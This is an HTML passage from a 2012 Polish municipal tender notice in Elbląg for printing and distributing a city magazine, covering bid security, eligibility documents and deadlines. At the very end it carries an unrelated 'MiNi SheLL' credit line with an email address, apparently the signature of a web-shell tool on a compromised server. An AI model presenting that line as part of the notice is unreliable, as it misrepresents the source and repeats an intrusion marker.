-	w gwarancjach ubezpieczeniowych, 
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
NR 95116022020000000061913418 w Banku Millennium S.A. O / Elbląg
Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) należy zdeponować w sekretariacie Departamentu Księgowości Urzędu Miejskiego w Elblągu.
2.	Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	co najmniej 2 usług przygotowania graficznego projektu i druku folderu lub przygotowania graficznego projektu i druku gazetki lub magazynu,
oraz
b)	co najmniej 2 usług dystrybucji folderu lub gazetki lub magazynu do gospodarstw domowych.

Zamawiający uzna warunek za spełniony, jeśli w ramach jednej bądź kilku odrębnych usług wykonane będą wymienione w pkt a), b) usługi.
Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku tj. liczba usług, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
-	zmiany terminów wykonania zamówienia dla poszczególnych etapów wydawania i dystrybucji Elbląskiego Serwisu Miejskiego wynikające z konieczności zamieszczenia dodatkowych materiałów informacyjnych w Elbląskim Serwisie Miejskim.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Departament Zamówień Publicznych pokój 403 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Departament Zamówień Publicznych pokój 403
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.   Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA	
     data zakończenia: 30 listopada 2013 r.
    w tym:
a) 	zakres określony w pkt III. ppkt 2.I. SIWZ	-	28 dni od daty udzielenia zamówienia
b) 	zakres określony w pkt III. ppkt 2.II. SIWZ	-	28 sierpnia 2012 r. 
c) 	zakres określony w pkt III. ppkt 2.III. SIWZ	-	30 listopada 2012 r.
d) 	zakres określony w pkt III. ppkt 2.IV. SIWZ	-	31 stycznia 2013 r.
e) 	zakres określony w pkt III. ppkt 2.V. SIWZ	-	31 maja 2013 r.
f) 	zakres określony w pkt III. ppkt 2.VI. SIWZ	-	28 sierpnia 2013 r.
g) 	zakres określony w pkt III. ppkt 2.VII. SIWZ	-	30 listopada 2013 r.

2. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).
3. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ:
a)	Przedmiot usługi należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w sekcji III.3.2) ogłoszenia.
b)	Dla usług wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie.
c)	Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia wykonywania usług, podając datę i kurs.
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w sekcji III.3.2) ogłoszenia.
e)	Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:
Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
a)  Treść wymaganego Oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych składanego przez osoby fizyczne Zamawiający przekazuje na ZAŁĄCZNIKU NR 2c do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument wymieniony w pkt VI.A. ppkt 2. SIWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

6. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty zawierajace oświadczenia, że:
-	nie otwarto likwidacji Wykonawcy ani nie ogłoszono upadłości,
-	nie orzeczono wobec Wykonawcy zakazu ubiegania się o zamówienie,
powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Dokument zawierający oświadczenie, że:
-    Wykonawca nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
 powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

7. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.

8. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com